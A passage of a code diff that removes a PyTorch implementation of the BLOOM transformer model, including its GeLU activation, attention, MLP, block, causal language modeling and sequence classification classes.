jitable. - - Args: - x (`torch.tensor`, *required*): - input hidden states - """ - return x * 0.5 * (1.0 + torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x))) - - -def bloom_gelu_back(g: torch.Tensor, x: torch.Tensor) -> torch.Tensor: - """ - gradient of tanh approximation of gelu gradient of actual gelu is: 0.5 * (1. + torch.erf(x * 0.70710678)) + - 0.3989423 * x * torch.exp(-0.5 * x * x) - - Args: - g (`torch.tensor`, *required*): - gradient output tensor - x (`torch.tensor`, *required*): - input tensor - """ - x = x[0] # x is a tuple of 1 element, needs to unpack it first - tanh_out = torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x)) - # sqrt(2/pi) * 3 * 0.044715 -> 0.1070322243 - ff = 0.5 * x * ((1 - tanh_out * tanh_out) * (0.79788456 + 0.1070322243 * x * x)) + 0.5 * (1 + tanh_out) - return ff * g - - -class GeLUFunction(torch.autograd.Function): - @staticmethod - def forward(ctx, input: torch.Tensor) -> torch.Tensor: - ctx.save_for_backward(input) - return bloom_gelu_forward(input) - - @staticmethod - def backward(ctx, grad_output: torch.Tensor) -> torch.Tensor: - input = ctx.saved_tensors - tmp = bloom_gelu_back(grad_output, input) - return tmp - - -class BloomGelu(nn.Module): - """ - BloomBiasGelu wrapper function that make use of the simple function on inference mode to make the model - torchscriptable and use the autograd function in training mode to get the accurate results of the gradients Partly - copied from Megatron-DeepSpeed code and adapted for our needs - - See here why autograd functions are not torchscriptable: https://github.com/pytorch/pytorch/issues/22329 - """ - - def __init__(self): - super().__init__() - - def forward(self, x: torch.Tensor) -> torch.Tensor: - if self.training: - return GeLUFunction.apply(x) - else: - return bloom_gelu_forward(x) - - -class BloomAttention(nn.Module): - def __init__(self, config: BloomConfig): - super().__init__() - - self.pretraining_tp = config.pretraining_tp - self.slow_but_exact = config.slow_but_exact - - self.hidden_size = config.hidden_size - self.num_heads = config.n_head - self.head_dim = self.hidden_size // self.num_heads - self.split_size = self.hidden_size - self.hidden_dropout = config.hidden_dropout - - if self.head_dim * self.num_heads != self.hidden_size: - raise ValueError( - f"`hidden_size` must be divisible by num_heads (got `hidden_size`: {self.hidden_size} and `num_heads`:" - f" {self.num_heads})." - ) - - # Layer-wise attention scaling - self.inv_norm_factor = 1.0 / math.sqrt(self.head_dim) - self.beta = 1.0 - - self.query_key_value = nn.Linear(self.hidden_size, 3 * self.hidden_size, bias=True) - self.dense = nn.Linear(self.hidden_size, self.hidden_size) - self.attention_dropout = nn.Dropout(config.attention_dropout) - - def _split_heads(self, fused_qkv: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]: - """ - Split the last dimension into (num_heads, head_dim) without making any copies, results share same memory - storage as `fused_qkv` - - Args: - fused_qkv (`torch.tensor`, *required*): [batch_size, seq_length, num_heads * 3 * head_dim] - - Returns: - query: [batch_size, seq_length, num_heads, head_dim] key: [batch_size, seq_length, num_heads, head_dim] - value: [batch_size, seq_length, num_heads, head_dim] - """ - batch_size, seq_length, three_times_hidden_size = fused_qkv.shape - fused_qkv = fused_qkv.view(batch_size, seq_length, self.num_heads, 3, self.head_dim) - return fused_qkv[..., 0, :], fused_qkv[..., 1, :], fused_qkv[..., 2, :] - - def _merge_heads(self, x: torch.Tensor) -> torch.Tensor: - """ - Merge heads together over the last dimension - - Args: - x (`torch.tensor`, *required*): [batch_size * num_heads, seq_length, head_dim] - - Returns: - torch.tensor: [batch_size, seq_length, num_heads * head_dim] - """ - # What we want to achieve is: - # batch_size * num_heads, seq_length, head_dim -> batch_size, seq_length, num_heads * head_dim - batch_size_and_num_heads, seq_length, _ = x.shape - batch_size = batch_size_and_num_heads // self.num_heads - - # First view to decompose the batch size - # batch_size * num_heads, seq_length, head_dim -> batch_size, num_heads, seq_length, head_dim - x = x.view(batch_size, self.num_heads, seq_length, self.head_dim) - - # batch_size, num_heads, seq_length, head_dim -> batch_size, seq_length, num_heads, head_dim - x = x.permute(0, 2, 1, 3) - - # batch_size, seq_length, num_heads, head_dim -> batch_size, seq_length, num_heads * head_dim - return x.reshape(batch_size, seq_length, self.num_heads * self.head_dim) - - def forward( - self, - hidden_states: torch.Tensor, - residual: torch.Tensor, - alibi: torch.Tensor, - attention_mask: torch.Tensor, - layer_past: Optional[Tuple[torch.Tensor, torch.Tensor]] = None, - head_mask: Optional[torch.Tensor] = None, - use_cache: bool = False, - output_attentions: bool = False, - ): - fused_qkv = self.query_key_value(hidden_states) # [batch_size, seq_length, 3 x hidden_size] - - # 3 x [batch_size, seq_length, num_heads, head_dim] - (query_layer, key_layer, value_layer) = self._split_heads(fused_qkv) - - batch_size, q_length, _, _ = query_layer.shape - - query_layer = query_layer.transpose(1, 2).reshape(batch_size * self.num_heads, q_length, self.head_dim) - key_layer = key_layer.permute(0, 2, 3, 1).reshape(batch_size * self.num_heads, self.head_dim, q_length) - value_layer = value_layer.transpose(1, 2).reshape(batch_size * self.num_heads, q_length, self.head_dim) - if layer_past is not None: - past_key, past_value = layer_past - # concatenate along seq_length dimension: - # - key: [batch_size * self.num_heads, head_dim, kv_length] - # - value: [batch_size * self.num_heads, kv_length, head_dim] - key_layer = torch.cat((past_key, key_layer), dim=2) - value_layer = torch.cat((past_value, value_layer), dim=1) - - _, _, kv_length = key_layer.shape - - if use_cache is True: - present = (key_layer, value_layer) - else: - present = None - - # [batch_size * num_heads, q_length, kv_length] - # we use `torch.Tensor.baddbmm` instead of `torch.baddbmm` as the latter isn't supported by TorchScript v1.11 - matmul_result = alibi.baddbmm( - batch1=query_layer, - batch2=key_layer, - beta=self.beta, - alpha=self.inv_norm_factor, - ) - - # change view to [batch_size, num_heads, q_length, kv_length] - attention_scores = matmul_result.view(batch_size, self.num_heads, q_length, kv_length) - - # cast attention scores to fp32, compute scaled softmax and cast back to initial dtype - [batch_size, num_heads, q_length, kv_length] - input_dtype = attention_scores.dtype - # `float16` has a minimum value of -65504.0, whereas `bfloat16` and `float32` have a minimum value of `-3.4e+38` - if input_dtype == torch.float16: - attention_scores = attention_scores.to(torch.float) - attn_weights = torch.masked_fill(attention_scores, attention_mask, torch.finfo(attention_scores.dtype).min) - attention_probs = F.softmax(attn_weights, dim=-1, dtype=torch.float32).to(input_dtype) - - # [batch_size, num_heads, q_length, kv_length] - attention_probs = self.attention_dropout(attention_probs) - - if head_mask is not None: - attention_probs = attention_probs * head_mask - - # change view [batch_size x num_heads, q_length, kv_length] - attention_probs_reshaped = attention_probs.view(batch_size * self.num_heads, q_length, kv_length) - - # matmul: [batch_size * num_heads, q_length, head_dim] - context_layer = torch.bmm(attention_probs_reshaped, value_layer) - - # change view [batch_size, q_length, num_heads * head_dim] - context_layer = self._merge_heads(context_layer) - - # aggregate results across tp ranks. See here: https://github.com/pytorch/pytorch/issues/76232 - if self.pretraining_tp > 1 and self.slow_but_exact: - slices = self.hidden_size / self.pretraining_tp - output_tensor = torch.zeros_like(context_layer) - for i in range(self.pretraining_tp): - output_tensor = output_tensor + F.linear( - context_layer[:, :, int(i * slices) : int((i + 1) * slices)], - self.dense.weight[:, int(i * slices) : int((i + 1) * slices)], - ) - else: - output_tensor = self.dense(context_layer) - - output_tensor = dropout_add(output_tensor, residual, self.hidden_dropout, self.training) - - outputs = (output_tensor, present) - if output_attentions: - outputs += (attention_probs,) - - return outputs - - -class BloomMLP(nn.Module): - def __init__(self, config: BloomConfig): - super().__init__() - hidden_size = config.hidden_size - - self.pretraining_tp = config.pretraining_tp - self.slow_but_exact = config.slow_but_exact - self.dense_h_to_4h = nn.Linear(hidden_size, 4 * hidden_size) - self.gelu_impl = BloomGelu() - self.dense_4h_to_h = nn.Linear(4 * hidden_size, hidden_size) - self.hidden_dropout = config.hidden_dropout - - def forward(self, hidden_states: torch.Tensor, residual: torch.Tensor) -> torch.Tensor: - hidden_states = self.gelu_impl(self.dense_h_to_4h(hidden_states)) - - if self.pretraining_tp > 1 and self.slow_but_exact: - intermediate_output = torch.zeros_like(residual) - slices = self.dense_4h_to_h.weight.shape[-1] / self.pretraining_tp - for i in range(self.pretraining_tp): - intermediate_output = intermediate_output + F.linear( - hidden_states[:, :, int(i * slices) : int((i + 1) * slices)], - self.dense_4h_to_h.weight[:, int(i * slices) : int((i + 1) * slices)], - ) - else: - intermediate_output = self.dense_4h_to_h(hidden_states) - - output = dropout_add(intermediate_output, residual, self.hidden_dropout, self.training) - - return output - - -class BloomBlock(nn.Module): - def __init__(self, config: BloomConfig): - super().__init__() - hidden_size = config.hidden_size - - self.input_layernorm = LayerNorm(hidden_size, eps=config.layer_norm_epsilon) - self.num_heads = config.n_head - self.self_attention = BloomAttention(config) - self.post_attention_layernorm = LayerNorm(hidden_size, eps=config.layer_norm_epsilon) - - self.mlp = BloomMLP(config) - - self.apply_residual_connection_post_layernorm = config.apply_residual_connection_post_layernorm - self.hidden_dropout = config.hidden_dropout - - def forward( - self, - hidden_states: torch.Tensor, - alibi: torch.Tensor, - attention_mask: torch.Tensor, - layer_past: Optional[Tuple[torch.Tensor, torch.Tensor]] = None, - head_mask: Optional[torch.Tensor] = None, - use_cache: bool = False, - output_attentions: bool = False, - ): - # hidden_states: [batch_size, seq_length, hidden_size] - - # Layer norm at the beginning of the transformer layer. - layernorm_output = self.input_layernorm(hidden_states) - - # Layer norm post the self attention. - if self.apply_residual_connection_post_layernorm: - residual = layernorm_output - else: - residual = hidden_states - - # Self attention. - attn_outputs = self.self_attention( - layernorm_output, - residual, - layer_past=layer_past, - attention_mask=attention_mask, - alibi=alibi, - head_mask=head_mask, - use_cache=use_cache, - output_attentions=output_attentions, - ) - - attention_output = attn_outputs[0] - - outputs = attn_outputs[1:] - - layernorm_output = self.post_attention_layernorm(attention_output) - - # Get residual - if self.apply_residual_connection_post_layernorm: - residual = layernorm_output - else: - residual = attention_output - - # MLP. - output = self.mlp(layernorm_output, residual) - - if use_cache: - outputs = (output,) + outputs - else: - outputs = (output,) + outputs[1:] - - return outputs # hidden_states, present, attentions - - -class BloomPreTrainedModel(PreTrainedModel): - config_class = BloomConfig - base_model_prefix = "transformer" - supports_gradient_checkpointing = True - _no_split_modules = ["BloomBlock"] - _skip_keys_device_placement = "past_key_values" - - def __init__(self, *inputs, **kwargs): - super().__init__(*inputs, **kwargs) - - def _init_weights(self, module: nn.Module): - """Initialize the weights.""" - if isinstance(module, nn.Linear): - # Slightly different from the TF version which uses truncated_normal for initialization - # cf https://github.com/pytorch/pytorch/pull/5617 - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.bias is not None: - module.bias.data.zero_() - elif isinstance(module, nn.Embedding): - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.padding_idx is not None: - module.weight.data[module.padding_idx].zero_() - elif isinstance(module, LayerNorm): - module.bias.data.zero_() - module.weight.data.fill_(1.0) - - def _set_gradient_checkpointing(self, module: nn.Module, value: bool = False): - if isinstance(module, BloomModel): - module.gradient_checkpointing = value - - @staticmethod - def _convert_to_standard_cache( - past_key_value: Tuple[Tuple[torch.Tensor, torch.Tensor]], batch_size: int - ) -> Tuple[Tuple[torch.Tensor, torch.Tensor]]: - """ - Standardizes the format of the cache so as to match most implementations, i.e. to tuple(tuple([batch_size, - num_heads, ...])) - """ - batch_size_times_num_heads, head_dim, seq_length = past_key_value[0][0].shape - num_heads = batch_size_times_num_heads // batch_size - # key: [batch_size * num_heads, head_dim, seq_length] -> [batch_size, num_heads, head_dim, seq_length] - # value: [batch_size * num_heads, seq_length, head_dim] -> [batch_size, num_heads, seq_length, head_dim] - return tuple( - ( - layer_past[0].view(batch_size, num_heads, head_dim, seq_length), - layer_past[1].view(batch_size, num_heads, seq_length, head_dim), - ) - for layer_past in past_key_value - ) - - @staticmethod - def _convert_to_bloom_cache( - past_key_value: Tuple[Tuple[torch.Tensor, torch.Tensor]] - ) -> Tuple[Tuple[torch.Tensor, torch.Tensor]]: - """ - Converts the cache to the format expected by Bloom, i.e. to tuple(tuple([batch_size * num_heads, ...])) - """ - batch_size, num_heads, head_dim, seq_length = past_key_value[0][0].shape - batch_size_times_num_heads = batch_size * num_heads - # key: [batch_size, num_heads, head_dim, seq_length] -> [batch_size * num_heads, head_dim, seq_length] - # value: [batch_size, num_heads, seq_length, head_dim] -> [batch_size * num_heads, seq_length, head_dim] - return tuple( - ( - layer_past[0].view(batch_size_times_num_heads, head_dim, seq_length), - layer_past[1].view(batch_size_times_num_heads, seq_length, head_dim), - ) - for layer_past in past_key_value - ) - - -BLOOM_START_DOCSTRING = r""" - - This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the - library implements for all its model (such as downloading or saving, resizing the input embeddings etc.) - - This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. - Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage - and behavior. - - Parameters: - config ([`BloomConfig`]): Model configuration class with all the parameters of the model. - Initializing with a config file does not load the weights associated with the model, only the - configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights. -""" - -BLOOM_INPUTS_DOCSTRING = r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, input_ids_length)`): - `input_ids_length` = `sequence_length` if `past_key_values` is `None` else `past_key_values[0][0].shape[2]` - (`sequence_length` of input past key value states). Indices of input sequence tokens in the vocabulary. - - If `past_key_values` is used, only `input_ids` that do not have their past calculated should be passed as - `input_ids`. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - past_key_values (`Tuple[Tuple[torch.Tensor]]` of length `config.n_layers`): - Contains precomputed hidden-states (key and values in the attention blocks) as computed by the model (see - `past_key_values` output below). Can be used to speed up sequential decoding. The `input_ids` which have - their past given to this model should not be passed as `input_ids` as they have already been computed. - - Each element of `past_key_values` is a tuple (past_key, past_value): - - past_key: [batch_size * num_heads, head_dim, kv_length] - - past_value: [batch_size * num_heads, kv_length, head_dim] - attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*): - Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*): - Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This - is useful if you want more control over how to convert `input_ids` indices into associated vectors than the - model's internal embedding lookup matrix. - - If `past_key_values` is used, optionally only the last `inputs_embeds` have to be input (see - `past_key_values`). - use_cache (`bool`, *optional*): - If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see - `past_key_values`). - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned - tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for - more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple. -""" - - -@add_start_docstrings( - "The bare Bloom Model transformer outputting raw hidden-states without any specific head on top.", - BLOOM_START_DOCSTRING, -) -class BloomModel(BloomPreTrainedModel): - def __init__(self, config: BloomConfig): - super().__init__(config) - - self.embed_dim = config.hidden_size - self.num_heads = config.n_head - - # Embedding + LN Embedding - self.word_embeddings = nn.Embedding(config.vocab_size, self.embed_dim) - self.word_embeddings_layernorm = LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon) - - # Transformer blocks - self.h = nn.ModuleList([BloomBlock(config) for _ in range(config.num_hidden_layers)]) - - # Final Layer Norm - self.ln_f = LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon) - - self.gradient_checkpointing = False - - # Initialize weights and apply final processing - self.post_init() - - def build_alibi_tensor(self, attention_mask: torch.Tensor, num_heads: int, dtype: torch.dtype) -> torch.Tensor: - return build_alibi_tensor(attention_mask, num_heads, dtype) - - def get_input_embeddings(self): - return self.word_embeddings - - def _prepare_attn_mask( - self, attention_mask: torch.Tensor, input_shape: Tuple[int, int], past_key_values_length: int - ) -> torch.BoolTensor: - # create causal mask - # [batch_size, seq_length] -> [batch_size, 1, tgt_length, src_length] - combined_attention_mask = None - device = attention_mask.device - _, src_length = input_shape - - if src_length > 1: - combined_attention_mask = _make_causal_mask( - input_shape, device=device, past_key_values_length=past_key_values_length - ) - - # [batch_size, seq_length] -> [batch_size, 1, tgt_length, src_length] - expanded_attn_mask = _expand_mask(attention_mask, tgt_length=src_length) - combined_attention_mask = ( - expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask | combined_attention_mask - ) - - return combined_attention_mask - - def set_input_embeddings(self, new_embeddings: torch.Tensor): - self.word_embeddings = new_embeddings - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=BaseModelOutputWithPastAndCrossAttentions, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.LongTensor] = None, - inputs_embeds: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor, ...], BaseModelOutputWithPastAndCrossAttentions]: - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") - elif input_ids is not None: - batch_size, seq_length = input_ids.shape - elif inputs_embeds is not None: - batch_size, seq_length, _ = inputs_embeds.shape - else: - raise ValueError("You have to specify either input_ids or inputs_embeds") - - if past_key_values is None: - past_key_values = tuple([None] * len(self.h)) - - # Prepare head mask if needed - # 1.0 in head_mask indicate we keep the head - # attention_probs has shape batch_size x num_heads x N x N - # head_mask has shape n_layer x batch x num_heads x N x N - head_mask = self.get_head_mask(head_mask, self.config.n_layer) - - if inputs_embeds is None: - inputs_embeds = self.word_embeddings(input_ids) - - hidden_states = self.word_embeddings_layernorm(inputs_embeds) - - presents = () if use_cache else None - all_self_attentions = () if output_attentions else None - all_hidden_states = () if output_hidden_states else None - - if self.gradient_checkpointing and self.training: - if use_cache: - logger.warning_once( - "`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..." - ) - use_cache = False - - # Compute alibi tensor: check build_alibi_tensor documentation - seq_length_with_past = seq_length - past_key_values_length = 0 - if past_key_values[0] is not None: - past_key_values_length = past_key_values[0][0].shape[2] - seq_length_with_past = seq_length_with_past + past_key_values_length - if attention_mask is None: - attention_mask = torch.ones((batch_size, seq_length_with_past), device=hidden_states.device) - else: - attention_mask = attention_mask.to(hidden_states.device) - - alibi = self.build_alibi_tensor(attention_mask, self.num_heads, dtype=hidden_states.dtype) - - causal_mask = self._prepare_attn_mask( - attention_mask, - input_shape=(batch_size, seq_length), - past_key_values_length=past_key_values_length, - ) - - for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)): - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - # None for past_key_value - return module(*inputs, use_cache=use_cache, output_attentions=output_attentions) - - return custom_forward - - outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(block), - hidden_states, - alibi, - causal_mask, - layer_past, - head_mask[i], - ) - else: - outputs = block( - hidden_states, - layer_past=layer_past, - attention_mask=causal_mask, - head_mask=head_mask[i], - use_cache=use_cache, - output_attentions=output_attentions, - alibi=alibi, - ) - - hidden_states = outputs[0] - if use_cache is True: - presents = presents + (outputs[1],) - - if output_attentions: - all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],) - - # Add last hidden state - hidden_states = self.ln_f(hidden_states) - - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if not return_dict: - return tuple(v for v in [hidden_states, presents, all_hidden_states, all_self_attentions] if v is not None) - - return BaseModelOutputWithPastAndCrossAttentions( - last_hidden_state=hidden_states, - past_key_values=presents, - hidden_states=all_hidden_states, - attentions=all_self_attentions, - ) - - -@add_start_docstrings( - """ - The Bloom Model transformer with a language modeling head on top (linear layer with weights tied to the input - embeddings). - """, - BLOOM_START_DOCSTRING, -) -class BloomForCausalLM(BloomPreTrainedModel): - _tied_weights_keys = ["lm_head.weight"] - - def __init__(self, config: BloomConfig): - super().__init__(config) - self.transformer = BloomModel(config) - self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings: torch.Tensor): - self.lm_head = new_embeddings - - def prepare_inputs_for_generation( - self, - input_ids: torch.LongTensor, - past_key_values: Optional[torch.Tensor] = None, - attention_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - **kwargs, - ) -> dict: - # only last token for input_ids if past is not None - if past_key_values: - input_ids = input_ids[:, -1].unsqueeze(-1) - - # the cache may be in the stardard format (e.g. in contrastive search), convert to bloom's format if needed - if past_key_values[0][0].shape[0] == input_ids.shape[0]: - past_key_values = self._convert_to_bloom_cache(past_key_values) - - # if `inputs_embeds` are passed, we only want to use them in the 1st generation step - if inputs_embeds is not None and past_key_values is None: - model_inputs = {"inputs_embeds": inputs_embeds} - else: - model_inputs = {"input_ids": input_ids} - - model_inputs.update( - { - "past_key_values": past_key_values, - "use_cache": kwargs.get("use_cache"), - "attention_mask": attention_mask, - } - ) - return model_inputs - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=CausalLMOutputWithCrossAttentions, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - labels: Optional[torch.Tensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor], CausalLMOutputWithCrossAttentions]: - r""" - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set - `labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100` - are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]` - """ - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - hidden_states = transformer_outputs[0] - - lm_logits = self.lm_head(hidden_states) - - loss = None - if labels is not None: - # move labels to correct device to enable model parallelism - labels = labels.to(lm_logits.device) - # Shift so that tokens < n predict n - shift_logits = lm_logits[..., :-1, :].contiguous() - shift_labels = labels[..., 1:].contiguous() - batch_size, seq_length, vocab_size = shift_logits.shape - # Flatten the tokens - loss_fct = CrossEntropyLoss() - loss = loss_fct( - shift_logits.view(batch_size * seq_length, vocab_size), shift_labels.view(batch_size * seq_length) - ) - - if not return_dict: - output = (lm_logits,) + transformer_outputs[1:] - return ((loss,) + output) if loss is not None else output - - return CausalLMOutputWithCrossAttentions( - loss=loss, - logits=lm_logits, - past_key_values=transformer_outputs.past_key_values, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - def _reorder_cache( - self, past: Tuple[Tuple[torch.Tensor, torch.Tensor], ...], beam_idx: torch.LongTensor - ) -> Tuple[Tuple[torch.Tensor, torch.Tensor], ...]: - """ - This function is used to re-order the `past_key_values` cache if [`~PreTrainedModel.beam_search`] or - [`~PreTrainedModel.beam_sample`] is called. This is required to match `past_key_values` with the correct - beam_idx at every generation step. - - Output shares the same memory storage as `past`. - """ - standardized_past = self._convert_to_standard_cache(past, batch_size=len(beam_idx)) - - # Get a copy of `beam_idx` on all the devices where we need those indices. - device_to_beam_idx = { - past_state.device: beam_idx.to(past_state.device) for layer_past in past for past_state in layer_past - } - reordered_past = tuple( - ( - layer_past[0].index_select(0, device_to_beam_idx[layer_past[0].device]), - layer_past[1].index_select(0, device_to_beam_idx[layer_past[0].device]), - ) - for layer_past in standardized_past - ) - return self._convert_to_bloom_cache(reordered_past) - - -@add_start_docstrings( - """ - The Bloom Model transformer with a sequence classification head on top (linear layer). - - [`BloomForSequenceClassification`] uses the last token in order to do the classification, as other causal models - (e.g. GPT-1) do. - - Since it does classification on the last token, it requires to know the position of the last token. If a - `pad_token_id` is defined in the configuration, it finds the last token that is not a padding token in each row. If - no `pad_token_id` is defined, it simply takes the last value in each row of the batch. Since it cannot guess the - padding tokens when `inputs_embeds` are passed instead of `input_ids`, it does the same (take the last value in - each row of the batch). - """, - BLOOM_START_DOCSTRING, -) -class BloomForSequenceClassification(BloomPreTrainedModel): - def __init__(self, config: BloomConfig): - super().__init__(config) - self.num_labels = config.num_labels - self.transformer = BloomModel(config) - self.score = nn.Linear(config.hidden_size, config.num_labels, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=SequenceClassifierOutputWithPast, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - labels: Optional[torch.Tensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor], SequenceClassifierOutputWithPast]: - r""" - labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for computing the sequence classification/regression loss. Indices should be in `[0, ..., - config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If - `config.num_labels > 1` a classification loss is computed (Cross-Entropy). - """ - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - hidden_states = transformer_outputs[0] - logits = self.score(hidden_states) - - if input_ids is not None: - batch_size = input_ids.shape[0] - else: - batch_size = inputs_embeds.shape[0] - - if self.config.pad_token_id is None and batch_size != 1: - raise ValueError("Cannot handle batch sizes > 1 if no padding token is defined.") - if self.config.pad_token_id is None: - sequence_lengths = -1 - else: - if input_ids is not None: - sequence_lengths = (torch.ne(input_ids, self.config.pad_token_id).sum(-1) - 1).to(logits.device) - else: - sequence_lengths = -1 - logger.warning( - f"{self.__class__.__name__} will not detect padding tokens in `inputs_embeds`. Results may be " - "unexpected if using padding tokens in conjunction with `inputs_embeds.`" - ) - - pooled_logits = logits[torch.arange(batch_size, device=logits.device), sequence_lengths] - - loss = None - if labels is not None: - if self.config.problem_type is None: - if self.num_labels == 1: - self.config.problem_type = "regression" - elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): - self.config.problem_type = "single_label_classification" - else: - self.config.problem_type = "multi_label_classification" - - if self.config.problem_type == "regression": - loss_fct = MSELoss() - if self.num_labels == 1: - loss = 